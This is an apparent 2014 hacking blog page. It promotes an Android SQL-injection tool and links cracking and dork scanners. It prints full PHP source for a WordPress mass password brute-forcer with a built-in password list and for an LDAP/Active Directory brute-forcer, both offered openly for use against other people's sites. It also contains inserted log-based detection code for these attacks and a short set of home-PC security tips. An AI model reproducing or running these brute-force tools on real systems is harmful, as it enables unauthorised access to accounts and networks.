
Sunday, January 19, 2014

HOW TO HACK A WEBSITE USING ANDROID PHONE - DROIDSQLI


Hello guys, today we talk about how to hack a website using your Android phone. We know that 70% of websites in the world are hacked using SQL injection.
To automate SQL injection we normally need a tool or OS such as BackTrack, Havij or Kali. But now you can attack a site and hack a website using your Android mobile phone or tablet.

You only need 3 things:
1 - An SQL injection vulnerable site
2 - An Android mobile
3 - The DroidSQLi tool

Download Droid SQLi


DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
Time based injection
Blind injection
Error based injection
Normal injection



It automatically selects the best technique to use and employs some simple filter evasion methods.

Hex Legend :)

Bypass Your Surveys

To Bypass Survey use this tool :

https://addons.mozilla.org/en-US/firefox.../noscript/

It really works :)

HASH CRACKER, DORKS & LOGIN PAGE SCANNER

Hash Cracker:-
MD5
MD5(MD5)
MD4
MD2
SHA1
NTLM
LM
Wordpress
http://isoftwarez.com/scanner/cracker/?

Sqli Dork Scanner:-
http://isoftwarez.com/scanner/scanner/?

Admin Login Page Scanner:-
http://isoftwarez.com/scanner/admin/?

WORDPRESS MASS BRUTEFORCE

Here Is A Tool For WP Mass BruteForce .. .. ..

PHP CODE:

<?
# Wordpress Mass brute Force Priv8 ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
echo '<html>
<head>
<link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
<meta name="author" content="Th3 K!LL3r Dz" />
<meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
<meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
<style type=\'text/css\'>
input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#FFFFFF;
border-top-color:#565656;
padding:4px 6px;
margin:4px 5px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:23px;
}


input[type=text], input[type=password]{
background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:18px;
margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
//border:1px solid rgba(0,0,0, 0.2);
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
}

input , textarea {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
outline: 0;
border-color: rgba(82, 168, 236, 0.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
-moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);


background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
overflow: auto;

}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
</style>
</head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>' ;
@ set_time_limit ( 0 );


if( $_POST [ 'x' ]){

echo "<hr>" ;

$sites = explode ( "\n" , $_POST [ "sites" ]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode ( "\n" , $_POST [ "w0rds" ]); // Get w0rdLiSt By Th3 K!LL3r Dz !

$Attack = new Wordpress_brute_Force (); // Active Class


foreach( $w0rds as $pwd ){

foreach( $sites as $site ){


$Attack -> check_it ( txt_cln ( $site ), $_POST [ 'usr' ], txt_cln ( $pwd )); // Brute :D
flush (); flush ();

}

}

}


# Class & Function'z

function txt_cln ( $value ){ return str_replace (array( "\n" , "\r" ), "" , $value ); }

class Wordpress_brute_Force {

public function check_it ( $site , $user , $pass ){ // print result

if( eregi ( 'profile.php' , $this -> post ( $site , $user , $pass ))){
echo "<span class=\"x2\"><b># Success : $user : $pass -> <a href=' $site /wp-admin/'> $site /wp-admin/</a></b></span><BR>" ;
$f = fopen ( "Wp-Result.txt" , "a+" ); fwrite ( $f , "Success ~~ $user : $pass -> $site /wp-admin/\n" ); fclose ( $f );
flush ();
}else{ echo "# Failed : $user : $pass -> $site <BR>" ; flush ();}

}

public function post ( $site , $user , $pass ){ // Post -> user & pass
$login = $site . '/wp-login.php' ;
$to = $site . '/wp-admin' ;
$token = $this -> extract_token ( $site );
$log = array ( 'Log In' , 'دخول' );
$data = array ( 'log' => $user , 'pwd' => $pass , 'rememberme' => 'forever' , 'wp-submit' => $log , 'redirect_to' => $to , 'testcookie' => 1 );

$curl = curl_init ();

curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_POST , 1 );
curl_setopt ( $curl , CURLOPT_POSTFIELDS , $data );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );

$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;

}

public function extract_token ( $site ){ // get token from source for -> function post

$source = $this -> get_source ( $site );

preg_match_all ( "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" , $source , $token );

return $token [ 1 ][ 0 ];

}

public function get_source ( $site ){ // get source for -> function extract_token

$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );

$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;

}

}
?>
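Seen from the server side, the script above leaves a recognisable trail in a web access log: repeated POSTs to /wp-login.php carrying its hard-coded User-Agent. The following detection sketch is an added example, not part of the original post; it assumes combined-format access logs and default WordPress behaviour (200 on a failed login, 302 on a successful one), and the log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict

# User-Agent copied from the script's CURLOPT_USERAGENT lines above.
SCRIPT_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) "
             "Gecko/2008111317 Firefox/3.0.4")

# Combined log format: ip - - [time] "METHOD path proto" status size "referer" "ua"
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)'
                  r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def analyse(lines, threshold=5):
    """Return {ip: stats} for clients whose wp-login.php POSTs look automated."""
    stats = defaultdict(lambda: {"posts": 0, "failed": 0, "script_ua": False,
                                 "success_after_failures": False})
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?")[0].endswith("/wp-login.php"):
            continue
        s = stats[m["ip"]]
        s["posts"] += 1
        s["script_ua"] = s["script_ua"] or m["ua"] == SCRIPT_UA
        if m["status"] == "200":      # bad password: WordPress re-renders the form
            s["failed"] += 1
        elif m["status"] == "302" and s["failed"] >= threshold:
            s["success_after_failures"] = True   # redirect after many failures
    return {ip: s for ip, s in stats.items()
            if s["failed"] >= threshold or s["script_ua"]}

def sample_log():
    """Constructed access-log lines: one guessing client, one normal login."""
    fmt = ('{ip} - - [19/Jan/2014:10:00:{sec:02d} +0000] '
           '"POST /wp-login.php HTTP/1.1" {st} 1500 "-" "{ua}"')
    lines = [fmt.format(ip="203.0.113.7", sec=i, st=200, ua=SCRIPT_UA) for i in range(6)]
    lines.append(fmt.format(ip="203.0.113.7", sec=6, st=302, ua=SCRIPT_UA))
    lines.append(fmt.format(ip="198.51.100.20", sec=9, st=302,
                            ua="Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"))
    return lines

if __name__ == "__main__":
    for ip, s in analyse(sample_log()).items():
        print(ip, s)
```

Because the script loops over passwords outermost and sites innermost, the attempts against any single site are spread out in time, so count over a long window rather than looking only for short bursts. A client flagged with success_after_failures should be handled as a compromised account, not just a blocked scan.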

LDAP (Active Directory) Brute Force

Here is a script to test LDAP (Active Directory) users.

LDAP module install:

~# apt-get install php5-ldap

Use:

php ldap_brute.php user_list.txt pass_list.txt log.txt

Code:

<?php

/*
 * Simple Ldap (Active Directory) brute force
 * by n4sss.
 * 
 * Need php5-ldap module in php (:
 * ~# apt-get install php5-ldap
 * ---snip---
 * 
 * 
 * php ldap_brute.php user_list.txt pass_list.txt log.txt
 * 
 *     $AD_server = "IP_AD";          
 *    $domain = "DOMAIN_AD";
 * 
 * 
 * twt -> @n4sss
 * 
 * */

error_reporting(0);


function save_content($file, $content){
    $fp = fopen($file, "a");
          fwrite($fp, $content."\r\n");
          fclose($fp);
}

function ad_connect($user, $pass, $log){
    $AD_server = "IP_AD";          // placeholder, as in the header comment
    $domain = "DOMAIN_AD";         // placeholder, as in the header comment
    $ad = ldap_connect($AD_server);
          ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
          ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);

    foreach($user as $user_id => $user_try){
        foreach($pass as $pass_id => $pass_try){
            sleep(1); // Edit it, if necessary (:
        if(!empty($user_try)){
            $user_try = trim($user_try);
            print "[$user_id] Trying user -> $user_try\n";
            $bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
            if( $bd ){
                print "\n+----------------------+\n";
                print "[+] $user_try - Password -> $pass_try\n";
                print "+------------------------+\n\n";
                save_content($log, "$user_try:$pass_try");
                }else{
                    echo "[-] WRONG!\n";
                 }
            ldap_unbind($ad);
       }
   }
}
}

if(!$argv[1] || !$argv[2] || !$argv[3]){
       print "==================================\n";
       print "Easy ldap(AD) brute force by n4sss\n";
       print "==================================\n";
       print "USE:\n";
       print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
       exit(0);       
    }else{
       $user = explode("\n", file_get_contents("$argv[1]"));
       $pass = array_filter(explode("\n", file_get_contents("$argv[2]")));
       $log = trim("$argv[3]");
       ad_connect($user, $pass,    $log);
  }

?>
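On the directory side, the script's loop order (every password for one user, one bind per second, then the next user) shows up as a run of failed logons from a single source. The following sliding-window detector is an added example, not part of the original post; it assumes failed-logon records (for instance Windows Security Event ID 4625 exported from a domain controller) already reduced to (timestamp, source, account) tuples, and the sample events, addresses and account names are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def detect_guessing(events, window=timedelta(minutes=5), per_account=5, accounts=3):
    """events: time-ordered (timestamp, source_ip, account) failed-logon tuples.
    Returns a list of (kind, source_ip, detail) alerts, each raised once."""
    recent = defaultdict(deque)      # source -> (ts, account) pairs inside the window
    alerts, seen = [], set()
    for ts, src, account in events:
        q = recent[src]
        q.append((ts, account))
        while q and ts - q[0][0] > window:
            q.popleft()              # drop failures older than the window
        same_account = sum(1 for _, a in q if a == account)
        distinct = {a for _, a in q}
        if same_account >= per_account and ("acct", src, account) not in seen:
            seen.add(("acct", src, account))
            alerts.append(("password-guessing", src, account))
        if len(distinct) >= accounts and ("multi", src) not in seen:
            seen.add(("multi", src))
            alerts.append(("multi-account", src, sorted(distinct)))
    return alerts

def sample_events():
    """Constructed events: one source walking three accounts at one bind per
    second (the script's cadence), plus a user who mistyped twice."""
    t0 = datetime(2014, 1, 19, 10, 0, 0)
    events, i = [], 0
    for user in ("alice", "bob", "carol"):
        for _ in range(6):
            events.append((t0 + timedelta(seconds=i), "10.0.0.50", user))
            i += 1
    events += [(t0 + timedelta(seconds=3), "10.0.0.9", "dave"),
               (t0 + timedelta(seconds=40), "10.0.0.9", "dave")]
    return sorted(events)

if __name__ == "__main__":
    for alert in detect_guessing(sample_events()):
        print(alert)
```

With an account lockout threshold configured in the domain, the per-account run is cut short after the threshold is reached; the multi-account alert still fires, which is why both conditions are tracked.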

Monday, January 13, 2014

How To Secure Your PC From Hackers

Today we will discuss how to secure your PC from hackers. First, we will discuss how hackers hack your PC.

Hackers use many methods. We will discuss how they hack and how to secure yourself from these kinds of attack. I hope you will feel more secure after reading this article, and if you still have any questions, you can contact us.

1. Keylogger

A keylogger is software that records all your keystrokes, screenshots and any activity you do on your PC and sends it to the attacker.

2. Password Stealer (iStealer)

A password stealer can steal your Hotmail, Netlog, Facebook, WoW, RapidShare, Yahoo and any other logins saved in your browser.

3. RAT (Remote Access Trojan)

A Remote Access Trojan is software used to control your PC. It allows the attacker to control your system; he can do basically anything with your computer using a RAT.

4. Botnet

It is also possible to use web browser hacking to infect computers with bot malware. A hacker can use your PC to attack a big target website and take it down.

5. Metasploit Framework

It is an open-source computer security project. It is designed to find security vulnerabilities in a system, but hackers misuse it to exploit systems: they search for a vulnerability in the system, exploit it and gain access.

6. Crypter

A crypter is a kind of tool that makes the above tools undetectable by antivirus, meaning the antivirus does not detect that the file is a virus.

We have discussed some of the methods that hackers mostly use to hack systems. Now we will discuss how to secure yourself from these kinds of attack.


Hackers create a server file using keylogger, password stealer, RAT or botnet software and send it to the user. The user downloads it, and when the user opens it, his PC becomes a slave of the attacker. The attacker always sends the file as torrent files, games, software or hacking software. People search for these kinds of hacks and download the software without knowing it is infected, and they become a slave of the attacker.
Hackers use a crypter to make the file undetectable by antivirus, but the file will become detectable after 1-2 weeks.

So if someone sends you a link or asks you to download a file, never download it. Or download it, wait for 2 weeks and then scan it with antivirus: if it is detected, it contains a virus; if not, you are lucky.

Some tips:
  • Always use antivirus (paid version)
  • Always set a password for your antivirus
  • Always update your browser and antivirus (if a new version is available)
  • Never download a file sent to you by someone unknown
  • Always use COMODO Firewall. It will help protect your PC from hackers: if there is any incoming connection to you, it will first ask you for permission, and if you think it is an unknown IP, just deny it, so hackers can't connect to your PC. It also helps by closing all ports. Attackers try to find an open port and then attack, but this software helps you close all your ports, which makes it hard for an attacker to exploit your system through Metasploit
  • Always use an anti-keylogger
  • Use Malwarebytes
Tutorial By Hex Legend - Pakistan Cyber Army - MaDLeeTs Team -